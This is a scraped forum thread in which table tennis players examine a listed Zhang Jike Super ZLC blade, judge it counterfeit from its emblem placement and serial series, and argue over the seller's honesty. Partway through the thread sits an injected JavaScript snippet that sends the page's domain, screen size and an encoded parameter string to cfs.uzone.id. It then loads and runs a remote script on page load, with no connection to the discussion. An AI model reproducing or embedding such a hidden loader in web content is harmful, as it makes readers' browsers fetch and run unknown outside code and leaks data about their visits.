Alex Table Tennis - MyTableTennis.NET Homepage
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Not for sale: Fake Zhang Jike Super ZLC FL

Post Reply Post Reply
Author
van_doorn View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote van_doorn Quote  Post ReplyReply Direct Link To This Post Topic: Not for sale: Fake Zhang Jike Super ZLC FL
    Posted: 05/29/2017 at 5:13am

FAKE blade. Will not be for sale. 

Edited by van_doorn - 05/30/2017 at 1:30pm
Butterfly Harimoto sZLC
Butterfly Tenergy 05
Xiom Vega Japan

MyFeedbackSection
Sponsored Links

bully View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote bully Quote  Post ReplyReply Direct Link To This Post Posted: 05/29/2017 at 5:30am
You, my friend, have a gem ! It's a first time when I see a SZLC made in 2012 ( M letter )...we all think first generation SZLC was made in 2013 ( N series ) !! Good luck ! :)
limjo View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote limjo Quote  Post ReplyReply Direct Link To This Post Posted: 05/29/2017 at 7:23am
To MYTT members, before anybody makes a deal for this 87g ZJK SZLC blade let us first establish the authenticity of this blade. The prints coming off does not happen on genuine blade since the graphics are printed onto the blade. The serial no. on original is engraved and does not just become blurry unless sanded. I also noticed the emblem color is yellow instead of bronze and should be seated on the middle of the yellow stripe. Please provide us the ff. info.

1. Please provide pics of the original box showing the matching serial no. on box and the blade.
2. Please provide pics of the bty. lens at the bottom of the blade.
3. Please give us the head measurement of the blade.

I have seen lots of genuine and fake ZJK SZLC's for me to easily spot the diff.
My feedback link:
http://mytabletennis.net/forum/forum_posts.asp?TID=65760&title=limjo-buy-sell-trade-feedback
Magic_M View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Magic_M Quote  Post ReplyReply Direct Link To This Post Posted: 05/29/2017 at 8:37am
This blade is definitely a fake. That's 100% sure.
van_doorn View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote van_doorn Quote  Post ReplyReply Direct Link To This Post Posted: 05/29/2017 at 9:01am
Hi Guys, 

I'm definitely not in the market to sell fake a blade. I'm putting the sale on hold until we've established the authenticity. If it's fake i'm pulling this sale immediately.

Can you help me out? Why do you think it's fake? And what more info do you need? I will take a deeper look at the color's and I will get the sale info from the guy i've purchased it from. I will get the info and pictures Limjo requested as soon as I get home. 

Do you guys need more info? 

Thanks!

Edited by van_doorn - 05/29/2017 at 9:03am
Butterfly Harimoto sZLC
Butterfly Tenergy 05
Xiom Vega Japan

MyFeedbackSection
proSpin View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote proSpin Quote  Post ReplyReply Direct Link To This Post Posted: 05/29/2017 at 11:07pm
hi Van_doorn, i sell butterfly products long enough to tell you that it is fake.

Edited by proSpin - 05/29/2017 at 11:17pm
LNH View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote LNH Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 12:29am
Hi,

I never owned a Super ZJK shakehand but I do owned a Super ZJK Cpen blade. 

When Butterfly first introduced the Super ZJK blade, I immediately contacted my regular Hong Kong TT shop
to order the Cpen blade.  The Super ZJK Cpen which I received from my Hkg tt shop is N series.

The Super ZJK shakehand sold by my Indonesia Bty agent is also N series, so my conclusion that the Super ZJK blade which you posted in this thread is FAKE. No doubt about it.
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKyu4DZfs99QqfHeehb8WxeWQEmR64VO6wwI%2baoU2lJbtiGaSOfpobHDanb%2fWgDk3MPin%2fbUjDaeg3v9TqhkACWGs3%2beH3IVbuFaq8GBdE7EElmSOLF%2br9aNB9blVwL5OA%2fgerktuyIgR19AjlA1UP%2fiG5ezFNjhO6aVqu5XSsiw0z95exN%2baLNM8yPupZ07xsW3fbcQRH1SIDK0d9fO%2bJrozAkfYAlCQIy6J1yYt%2bJHb4CBup8rBnvCMLnJgTiv0Lw7%2fHkOr8k5aihYbQt9I1PF0z15Iv%2bGteMPtRJNkJ8JOk3GbOFdB%2bl6tn4C6YS44vhZeAO3S%2fsQCpyfAqEIQMeVysy%2fvsMuMjnRPKn56GbqsMRmqjAUePY7uvpj0pFioSGaTaQBB0vLNsJ3RA1PPG8nrP25w%2frmK3z%2bc%2fWP3RuxgFMVuuqydDrLZUvtaFti41U1axkT91zhyR5Qb%2f6%2bXUVekqlLeDAJdrpK%2bwB2fLF9%2fQePvGQkckFQOW11csoEp8cbnLXfM4Wozu8DLRLFu7up0wv0CAb%2f49DD4KYAHkVg5E5Vm33wnMFzEolf1hosub" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Magic_M View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Magic_M Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 1:04am
limjo already posted a very important detail:
Originally posted by limjo limjo wrote:

I also noticed the emblem color is yellow instead of bronze and should be seated on the middle of the yellow stripe.

Please compare yourself:

The difference can not be bigger. On the original blade the rhombus is placed exactly in the middle of the stripe. On the fake blade it is placed too high.

And I totally agree to bully:
Originally posted by bully bully wrote:

It's a first time when I see a SZLC made in 2012 ( M letter )...... first generation SZLC was made in 2013 ( N series ) !! Good luck ! :)

I believe you, that you don`t try to cheat us, because you posted detailed pictures from the first moment on, but you have to realize, that someone sold you a really bad fake. The value of such a fake SZLC is round about 20€ (http://www.buychina.com/items/zlc-zhang-jike-zhang-jike-super-super-zlc-super-zlc-36541-23580-zhangjike-zlc-spotvsrsmqk)
tomkei View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote tomkei Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 3:22am
he is honorable person, i think  he just didnt know about  not genuine blade :)
xiom vega euro,sigma2pro,el-p
xiom vega pro
mizutani zlc,t05fx,r53
mizutani zlc,h8mid,rakza9

My Feedback
van_doorn View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote van_doorn Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 3:37am
Thanks for all the responses! I've looked at all the details you guys mentioned and yes, the blade is fake. I've contacted the guy i've bought it from, he didn't know either. So we're both f*cked. 

I'm pulling the sale. This thing will be destroyed and will never see the daylight again LOL

Apologies for putting this thing online! 

Butterfly Harimoto sZLC
Butterfly Tenergy 05
Xiom Vega Japan

MyFeedbackSection
tiehwen View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote tiehwen Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 9:53am
could you somehow trace who the original "seller" or "scammer" was? Post his/her username here so that we could all avoid dealing with whoever that was..
Hope you got your $$$$ back...no?
photino View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote photino Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 11:17am
He can not remain silence either way. He should disclose where he bought from and we trace back the origin seller. 

Originally posted by tomkei tomkei wrote:

he is honorable person, i think  he just didnt know about  not genuine blade :)
EJ-turned blade collector
notfound123 View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote notfound123 Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 12:33pm
something does not make sense here... first OP tries to sell a fake blade for 250+ 
Once people spotted the fake, he now claims he bought it from another person (WHOM?), and immediately "destroys" it, without providing much of the background on how he got it.

Let's assume for a second he didn't know and he bought this fake blade for a couple hundred dollars ...I am sorry but his reaction just does not seem sincere

piligrim View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote piligrim Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 12:58pm
Originally posted by tiehwen tiehwen wrote:

could you somehow trace who the original "seller" or "scammer" was? Post his/her username here so that we could all avoid dealing with whoever that was..
Hope you got your $$$$ back...no?

maybe not from this forum. can be local seller
proSpin View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote proSpin Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 1:24pm
Originally posted by notfound123 notfound123 wrote:

something does not make sense here... first OP tries to sell a fake blade for 250+ 
Once people spotted the fake, he now claims he bought it from another person (WHOM?), and immediately "destroys" it, without providing much of the background on how he got it.

Let's assume for a second he didn't know and he bought this fake blade for a couple hundred dollars ...I am sorry but his reaction just does not seem sincere

I couldn't agree more! Thumbs Up
Why is he silent about the source?
van_doorn View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote van_doorn Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 1:27pm
Hey Guys,

I'm still getting to the bottom of this. I've purchased it from a guy from a dutch table tennis forum that I've known for years and did many trades with. He's just as shocked as I am. He had this blade for over a year. He purchased it from a guy at a local tournament. They are emailing about this problem as we speak.

The blade is not getting destroyed. The guy I've bought it from wants it back, because he's played with it for a long time. I have a pretty solid track record here, with lots of expensive blades. I'm open about everything, so if you have a question just ask and don't just assume everything. Sadly these things happen.

If I get more info, I will post it here.

Edited by van_doorn - 05/30/2017 at 1:30pm
Butterfly Harimoto sZLC
Butterfly Tenergy 05
Xiom Vega Japan

MyFeedbackSection
Danny1973 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Danny1973 Quote  Post ReplyReply Direct Link To This Post Posted: 05/30/2017 at 4:21pm
I know van Doorn for some years, and he is a nice and reliable guy. I bought some materials from him. His communiction is clear. I'm sure he won't cheat by selling a fake blade.
Xiom Azx icecream
FH Xiom Omega 7 pro max
BH Xiom Omega 7 pro max
Baal View Drop Down
Forum Moderator
Forum Moderator

Post Options Post Options   Thanks (0) Thanks(0)   Quote Baal Quote  Post ReplyReply Direct Link To This Post Posted: 05/31/2017 at 5:22pm
Van Dorn has done exactly the right thing. Thanks to him for posting clear pictures. This is why I put that rule in place.
Matt Pimple View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Matt Pimple Quote  Post ReplyReply Direct Link To This Post Posted: 05/31/2017 at 5:27pm
Originally posted by Baal Baal wrote:

Van Dorn has done exactly the right thing. Thanks to him for posting clear pictures. This is why I put that rule in place.

Amen to that and thank you Baal! Though there still seem to be people here refusing to post pics...
OSP Ultimate; Dr. Neubauer Dominance Spin Hard max, Dr. Neubauer Troublemaker 0.5

My Feedback
vajica View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote vajica Quote  Post ReplyReply Direct Link To This Post Posted: 06/01/2017 at 8:29am
I have recently bought fake TB ALC on eBay, it was with rubbers, and seller had perfect reputation, so I didn't suspect anything.

I contacted the guy, made some pictures of his blade along the original ALC and he gave me the return address immediately.
Apparently he played it for almost a year without knowing it is a fake one, and he bought it from a player in the local club too.

All went great, he refunded me the very moment he got the blade, I really think that all he said was true, and I think this was absolutely the same case as with this ZJK here...

kevo View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote kevo Quote  Post ReplyReply Direct Link To This Post Posted: 06/02/2017 at 8:30am
I've bought blades from Van Dorn before and he's solid. I'd vouch for him and the scenario is totally believable. A bit more trust in the world--and a look at his great feedback thread!--wouldn't go amiss.
BeaverMD View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote BeaverMD Quote  Post ReplyReply Direct Link To This Post Posted: 06/02/2017 at 8:41am
This is actually troubling because it shows that even established members like van_doorn can fall victim to fake blades.  I hope he investigates the source of the blade and posts it here.  Something does not seem right.
 Post Reply Post Reply
  Share Topic